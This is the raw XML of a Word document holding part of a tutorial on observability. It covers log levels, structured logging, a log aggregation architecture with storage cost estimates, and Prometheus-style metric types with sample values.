            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose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5F799D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="0C8EBFF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68D31C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>TRACE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77896C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Finest-grained debugging (usually off in prod)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DFF38A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Entering function processPayment with args..."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="5C29352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6811FE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>DEBUG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87293F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Diagnostic information for developers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4625E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Cache miss for key user:42:profile"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="657A7F7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EA283D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>INFO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166FAC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Normal operational events (audit trail)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C6E636" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Order 12345 placed successfully"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="63BE703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787D2D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>WARN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6700BC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Unexpected but handled situations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9420E3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Retry attempt 2/3 for DB connection"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="164CA50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E3E053" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:lastRenderedPageBreak/>
              <w:t>ERROR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218AAD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Failures requiring attention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D1BD00" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Payment failed: timeout after 30s"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="5D9B91B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6308E2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>FATAL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5880B3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>System is going down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4E0827" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>"Out of memory, shutting down"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3430FEC1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Structured vs. Unstructured logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA0894" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54180722" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Unstructured (bad for querying):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6765F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  "2026-05-28 14:30:05 ERROR PaymentService - Failed to process payment for user 42: timeout"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687FE3E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7A31614B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Structured (good for querying):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E731B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  {"timestamp":"2026-05-28T14:30:05Z", "level":"ERROR", "service":"payment", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42AC33" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   "user_id":"42", "error":"timeout", "duration_ms":30000}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4EEC1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="42D82DDE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Structured logs enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64699F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Filter: level=ERROR AND service=payment AND duration_ms &gt; 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79350001" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Aggregate: COUNT(*) GROUP BY error, service WHERE level=ERROR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E2153" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Correlate: JOIN with traces via trace_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61237A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log aggregation architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029ACD40" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C0CBA2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50CA9B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Application Pods                                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879465F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  stdout/stderr → container runtime → log collector              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D87F0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4E026" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737E31A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610395C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>┌────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07753AE5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Log Collector (Fluentd, Fluent Bit, Vector, Logstash)           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376106B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Parse structured logs                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B2B57" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Enrich with metadata (pod name, namespace, node)            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA7D6C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Buffer and batch                                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A89C0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Route to destinations                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C36BC9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050ABA1E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792B7F1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              ┌──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A73E04" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502F267" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        ┌──────────┐ ┌────────┐ ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A0FD1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        │Elastic/  │ │ Loki   │ │ S3/GCS   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD99D2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        │OpenSearch│ │(Grafana)│ │(Archive) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62DF6A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        └──────────┘ └────────┘ └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F219BFB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log volume and cost challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769C80C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C425D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>1000 pods × 100 log lines/sec × 500 bytes/line = 50 MB/sec = 4.3 TB/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFAA0A2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="15F13F32" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Storage cost (Elasticsearch): 4.3 TB × $0.10/GB/month × 30 days retention = $12,900/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63121A8F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Storage cost (Loki + S3):     4.3 TB × $0.023/GB/month × 30 days = $2,967/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891BF08" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1A5A8301" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Strategies to reduce cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6082D3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Log only what matters (don't log every successful health check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A879ABE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Use sampling for high-volume debug logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F482671" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Shorter retention for verbose levels (DEBUG: 3 days, ERROR: 90 days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF79876" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Compress aggressively (Loki: log labels as index, chunks compressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0D7C9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Metrics — Aggregated Measurements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8309AC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What metrics are:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t> Numeric measurements collected at regular intervals, representing the state or rate of change of some system property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16C22F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D244F7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Metric types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509E352" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="47629F20" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Counter (monotonically increasing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F5C67" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_requests_total{method="GET", status="200", endpoint="/api/users"} 142857</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08A3BA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Only goes up. Use rate() to calculate requests/second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DD4EA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5E5DCD47" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Gauge (arbitrary value, goes up and down):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F990671" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  memory_usage_bytes{pod="api-server-1"} 2147483648</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C98FB3C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  cpu_usage_percent{pod="api-server-1"} 73.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB1300" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Current value. Can increase or decrease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44B78B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="734259D0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Histogram (distribution of values in buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C6664" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="0.01"} 5000     (≤10ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670DE78" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="0.05"} 45000    (≤50ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313A120" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="0.1"}  48000    (≤100ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731901F1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="0.5"}  49500    (≤500ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C7908" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="1.0"}  49900    (≤1s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BF2C2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="+Inf"} 50000    (all)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CE7ED" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Enables percentile calculation: p50, p95, p99.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A34B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="4774D3C7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Summary (pre-calculated percentiles):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED52D5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  http_request_duration_seconds{quantile="0.5"} 0.023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F918B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds{quantile="0.99"} 0.45</w:t>
      </w:r>
    </w:p>
